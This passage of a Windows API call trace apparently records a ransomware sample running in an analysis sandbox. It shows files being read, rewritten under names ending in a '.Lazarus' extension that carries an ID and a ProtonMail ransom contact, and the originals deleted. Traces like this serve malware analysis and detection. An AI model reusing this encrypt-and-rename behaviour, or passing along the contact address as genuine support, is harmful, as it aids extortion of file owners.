(dwErrCode=0x0) [0070.995] GetLastError () returned 0x0 [0070.995] SetLastError (dwErrCode=0x0) [0070.995] GetLastError () returned 0x0 [0070.995] SetLastError (dwErrCode=0x0) [0070.995] GetLastError () returned 0x0 [0070.995] SetLastError (dwErrCode=0x0) [0070.996] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0xf70, lpOverlapped=0x0) returned 1 [0070.996] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.996] GetLastError () returned 0x0 [0070.996] SetLastError (dwErrCode=0x0) [0070.996] GetLastError () returned 0x0 [0070.996] SetLastError (dwErrCode=0x0) [0070.996] GetLastError () returned 0x0 [0070.996] SetLastError (dwErrCode=0x0) [0070.996] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0070.997] GetLastError () returned 0x0 [0070.997] SetLastError (dwErrCode=0x0) [0070.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0070.997] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xf70, lpOverlapped=0x0) returned 1 [0070.997] GetLastError () returned 0x0 [0070.997] SetLastError (dwErrCode=0x0) [0070.997] GetLastError () returned 0x0 [0070.997] SetLastError (dwErrCode=0x0) [0070.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0070.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0070.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0070.997] CloseHandle (hObject=0x410) returned 1 [0071.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0071.011] CloseHandle (hObject=0x418) returned 1 [0071.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0071.011] AreFileApisANSI () returned 1 [0071.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0071.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 45 [0071.011] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.012] GetFileType (hFile=0x418) returned 0x1 [0071.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0071.013] GetLastError () returned 0xb7 [0071.013] SetLastError (dwErrCode=0xb7) [0071.013] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0071.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0071.014] CloseHandle (hObject=0x418) returned 1 [0071.014] AreFileApisANSI () returned 1 [0071.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0071.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 45 [0071.014] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml")) returned 1 [0071.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0071.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0071.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0071.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0071.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.016] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0071.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0071.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0071.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0071.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0071.017] AreFileApisANSI () returned 1 [0071.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0071.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0071.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0071.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0071.017] AreFileApisANSI () returned 1 [0071.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0071.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 46 [0071.017] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.017] GetFileType (hFile=0x418) returned 0x1 [0071.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0071.018] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0071.018] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0071.018] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0071.018] CloseHandle (hObject=0x418) returned 1 [0071.018] AreFileApisANSI () returned 1 [0071.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0071.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 46 [0071.018] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.019] GetFileType (hFile=0x418) returned 0x1 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0071.019] CloseHandle (hObject=0x418) returned 1 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0071.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0071.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0071.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.020] AreFileApisANSI () returned 1 [0071.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0071.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 46 [0071.020] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558)) returned 1 [0071.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0071.020] AreFileApisANSI () returned 1 [0071.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0071.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0071.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0071.020] GetLastError () returned 0x0 [0071.020] SetLastError (dwErrCode=0x0) [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3b0 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0071.020] GetLastError () returned 0x0 [0071.020] SetLastError (dwErrCode=0x0) [0071.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x715b8 [0071.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0071.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0071.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0071.021] AreFileApisANSI () returned 1 [0071.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0071.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0071.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0071.021] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.021] GetFileType (hFile=0x418) returned 0x1 [0071.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0071.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0071.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.022] AreFileApisANSI () returned 1 [0071.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0071.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 46 [0071.022] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.022] GetFileType (hFile=0x410) returned 0x1 [0071.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a630 [0071.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.022] GetLastError () returned 0x0 [0071.022] SetLastError (dwErrCode=0x0) [0071.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.022] GetLastError () returned 0x0 [0071.022] SetLastError (dwErrCode=0x0) [0071.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0071.022] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0071.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0071.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0071.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0071.130] GetLastError () returned 0x0 [0071.130] SetLastError (dwErrCode=0x0) [0071.130] GetLastError () returned 0x0 [0071.130] SetLastError (dwErrCode=0x0) [0071.130] GetLastError () returned 0x0 [0071.130] SetLastError (dwErrCode=0x0) [0071.130] GetLastError () returned 0x0 [0071.130] SetLastError (dwErrCode=0x0) [0071.130] 